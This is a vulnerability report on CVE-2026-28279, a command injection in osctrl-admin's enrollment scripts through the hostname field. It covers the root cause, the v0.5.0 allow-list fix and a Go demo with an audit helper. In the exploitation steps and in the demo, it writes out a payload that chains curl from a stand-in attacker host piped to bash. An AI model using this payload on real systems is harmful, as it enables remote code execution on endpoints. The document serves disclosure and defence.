CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-28279
CVSS 7.3 · EPSS 0.11%

osctrl-admin Enrollment Script Command Injection

Amit Schendel
Senior Security Researcher

Feb 28, 2026 · 5 min read

PoC Available

Executive Summary (TL;DR)

Authenticated RCE in osctrl < v0.5.0 allows attackers to compromise endpoints during enrollment by injecting commands into the hostname field.

A critical command injection vulnerability exists in the osctrl-admin component of the osctrl osquery management platform. The vulnerability allows authenticated administrators to inject arbitrary shell commands into generated enrollment scripts via the environment hostname parameter. When these scripts are executed on endpoints to install the osquery agent, the injected commands run with high privileges (typically root or SYSTEM), allowing for potential fleet-wide compromise.

Vulnerability Overview

A security flaw has been identified in osctrl-admin, the administrative interface for the osctrl osquery management solution. The vulnerability, classified as OS Command Injection (CWE-78), resides in the logic used to generate enrollment scripts—"one-liners" provided to administrators for deploying osquery agents to endpoints. The affected component fails to properly sanitize user-supplied configuration data before embedding it into shell (Linux/macOS) and PowerShell (Windows) scripts.

This flaw introduces a significant supply-chain risk within the managed environment. Although the vulnerability requires administrative authentication to the management console, it allows a compromised or malicious administrator to pivot from the central server to the managed endpoints. Because enrollment scripts are typically executed with elevated privileges (root or SYSTEM) to install system services, the injected commands inherit these permissions, granting the attacker full control over the target machine during the enrollment phase.

Root Cause Analysis

The root cause of this vulnerability is the unsafe use of Go's text/template package for generating executable scripts, combined with a lack of input validation on the hostname parameter. In the osctrl-admin backend, environment configurations allow administrators to specify a hostname where the osquery agents should connect (e.g., osctrl.example.com).

When an administrator requests an enrollment script, the backend reads a template file and substitutes the configuration values into the script text. The text/template engine performs raw string substitution and does not offer context-aware escaping for shell syntax. Consequently, if the hostname parameter contains shell metacharacters—such as semicolons (;), pipes (|), or command substitutions ($() or `)—these characters are written literally into the generated script.

For example, a legitimate script line might look like this: ./osquery-install.sh --flag --hostname {{ .Hostname }}

If the input is not sanitized, a malicious input transforms the line into valid shell logic that executes an additional command: ./osquery-install.sh --flag --hostname osctrl.com; malicious_command

Code Analysis & Fix

The remediation for CVE-2026-28279 involves enforcing strict input validation on environment parameters before they are persisted to the database. The maintainers introduced a specific regex filter to ensure the hostname contains only safe characters (alphanumeric, dots, and hyphens).

Vulnerable Logic (Conceptual): Previously, the HTTP handler for updating environments accepted the hostname string directly from the POST request body and saved it to the configuration store without validating its contents against a strict allow-list.

Patched Logic (v0.5.0): A new validation function was added in pkg/environments/filters.go to reject any input containing shell metacharacters.

// pkg/environments/filters.go
package environments

import "regexp"

const (
    // Strict regex allowing only alphanumeric chars, dots, and hyphens.
    // Every shell metacharacter (; | & $ ` ( ) and whitespace) falls outside
    // this class, so a matching value cannot alter the generated script.
    hostnameRegex string = `^[a-zA-Z0-9.\-]+$`
)

// HostnameFilter returns true only when the whole string matches the allow-list.
func HostnameFilter(s string) bool {
    re := regexp.MustCompile(hostnameRegex)
    return re.MatchString(s)
}

The EnvsPOSTHandler in cmd/admin/handlers/post.go was updated to invoke this filter. If VerifyEnvFilters fails, the server returns an error code (400 Bad Request or 500 Internal Server Error) and refuses to save the malicious configuration, preventing the injection at the source. Because the check runs when an environment is written, hostnames that were stored before the upgrade are not covered by it retroactively; after upgrading, existing environment records are worth reviewing against the same allow-list. Note also that the allow-list rejects colons, so host:port values and IPv6 literals do not pass it.

Exploitation Scenario

Exploitation of this vulnerability requires an attacker to possess credentials for the osctrl-admin interface. Once authenticated, the attack follows a specific workflow targeting the enrollment process.

  1. Injection: The attacker navigates to the environment configuration settings and modifies the hostname field. Instead of a valid domain, they input a payload such as osctrl.local; curl http://attacker-c2.com/payload.sh | bash.
  2. Generation: The attacker (or a legitimate administrator unaware of the change) generates an enrollment script (e.g., a .sh or .ps1 one-liner) from the UI. The backend templates the malicious string directly into the command arguments of the script.
  3. Execution: The script is distributed to a target machine. When an operator runs it with sudo or as Administrator to install osquery, the shell treats the semicolon as a statement separator (sh/bash and PowerShell both do). It executes the osquery installation command and then, immediately, the injected curl/bash command.

This attack vector is particularly dangerous because it occurs before the security agent is successfully installed and reporting. The malicious activity runs outside the visibility of the tool meant to monitor the system.
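The following Go program is an added illustration of the mechanism described in the root-cause, fix and exploitation sections above; it is written for this article and is not osctrl's own code. It renders a constructed one-line stand-in for the enrollment template with text/template (the real templates are full install scripts), applies an allow-list of the same shape as the v0.5.0 filter, and audits a constructed map of environment hostnames for values that would fail it. The template line, the environment names, the attacker payload and the RenderUnchecked, RenderChecked and AuditEnvironments helpers are all assumptions made for the example.

```go
package main

import (
	"bytes"
	"fmt"
	"regexp"
	"sort"
	"text/template"
)

// enrollTemplate is a constructed one-line stand-in for an osctrl enrollment
// template, shaped like the line quoted in the root-cause section. The real
// templates are full install scripts; only the substitution step matters here.
const enrollTemplate = "./osquery-install.sh --flag --hostname {{ .Hostname }}\n"

// hostnameRe mirrors the allow-list introduced in v0.5.0: letters, digits,
// dots and hyphens only, so ';', '|', '$', '`', '&', '(' and whitespace can
// never reach the template. Compiled once at package level.
var hostnameRe = regexp.MustCompile(`^[a-zA-Z0-9.\-]+$`)

// HostnameFilter reports whether s is acceptable as an environment hostname.
func HostnameFilter(s string) bool {
	return hostnameRe.MatchString(s)
}

// RenderUnchecked reproduces the pre-0.5.0 behaviour: text/template copies the
// value into the script byte for byte. It has no notion of shell quoting, so a
// hostname that contains shell syntax becomes shell syntax in the output.
func RenderUnchecked(hostname string) (string, error) {
	tmpl, err := template.New("enroll").Parse(enrollTemplate)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := tmpl.Execute(&buf, map[string]string{"Hostname": hostname}); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// RenderChecked is the hardened path: the same template, but the value is
// validated against the allow-list first. The v0.5.0 patch applies the check
// when the environment is saved; repeating it at render time is cheap defence
// in depth for values that were stored before the upgrade.
func RenderChecked(hostname string) (string, error) {
	if !HostnameFilter(hostname) {
		return "", fmt.Errorf("hostname %q rejected: only [a-zA-Z0-9.-] is allowed", hostname)
	}
	return RenderUnchecked(hostname)
}

// AuditEnvironments is a post-upgrade check for an existing deployment: given
// environment name -> stored hostname, it returns (sorted) the environments
// whose hostname would fail the new filter and whose previously generated
// enrollment scripts should therefore be treated as untrusted.
func AuditEnvironments(hostnames map[string]string) []string {
	var flagged []string
	for name, h := range hostnames {
		if !HostnameFilter(h) {
			flagged = append(flagged, name)
		}
	}
	sort.Strings(flagged)
	return flagged
}

func main() {
	benign := "osctrl.example.com"
	// Constructed payload of the shape given in the exploitation scenario.
	malicious := "osctrl.local; curl http://attacker-c2.com/payload.sh | bash"

	out, _ := RenderUnchecked(malicious)
	fmt.Print("pre-0.5.0 render:\n  ", out)

	if _, err := RenderChecked(malicious); err != nil {
		fmt.Println("v0.5.0-style render:", err)
	}
	out, _ = RenderChecked(benign)
	fmt.Print("v0.5.0-style render:\n  ", out)

	// Constructed environment table with one value saved before the fix.
	envs := map[string]string{"production": benign, "lab": malicious}
	fmt.Println("environments to review:", AuditEnvironments(envs))
}
```

The unchecked render emits the page's injected line unchanged, which is the whole bug: no Go standard-library template package escapes for shell (html/template is context-aware for HTML, JavaScript, CSS and URLs, not for sh or PowerShell), so the only robust fix is to refuse anything outside a tight allow-list before it is stored, which is what the v0.5.0 filter does. The audit function is the check a practitioner would run once after upgrading, since the filter only guards new writes.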

Impact Assessment

The impact of CVE-2026-28279 is rated High (CVSS 7.3) due to the potential for complete system compromise on enrolled endpoints. The adjacent attack vector (AV:A), high attack complexity (AC:H), high privileges (PR:H) and required user interaction (UI:R) lower the base score, but the Scope Change (S:C) reflects the critical nature of the vulnerability: a compromise of the management plane leads directly to a compromise of the managed infrastructure.

Key Risks:

  • Remote Code Execution: Arbitrary commands run as root/SYSTEM on endpoints.
  • Persistence: Attackers can install backdoors or rootkits during the enrollment phase, ensuring access even if the osquery agent is later removed or reconfigured.
  • Lateral Movement: Compromising the enrollment server allows an attacker to pivot to any new machine joining the network, potentially affecting the entire fleet if the corrupted script is widely distributed.

Official Patches

jmpsec/osctrl v0.5.0 Release Notes
jmpsec/osctrl Pull Request #780


Technical Appendix

CVSS Score: 7.3 / 10
Vector: CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
EPSS Probability: 0.11% (top 70% most exploited)

Affected Systems

osctrl-admin < v0.5.0

Affected Versions Detail

Product           Affected Versions   Fixed Version
osctrl (jmpsec)   < 0.5.0             0.5.0

Attribute        Detail
CWE ID           CWE-78
CVSS v3.1        7.3 (High)
Attack Vector    Adjacent Network
Exploit Status   PoC Available
EPSS Score       0.00112
Patch Version    0.5.0

MITRE ATT&CK Mapping

T1059 Command and Scripting Interpreter (Execution)
T1190 Exploit Public-Facing Application (Initial Access)
CWE-78 OS Command Injection

Known Exploits & Detection

Manual PoC involving environment configuration modification

Vulnerability Timeline

2025-12-24  Initial security patches committed
2026-02-26  Vulnerability publicly disclosed (GHSA)
2026-02-27  NVD publication and CVSS scoring

References & Sources

  • [1] GHSA-rchw-322g-f7rm Advisory
  • [2] NVD Entry for CVE-2026-28279

Attack Flow Diagram
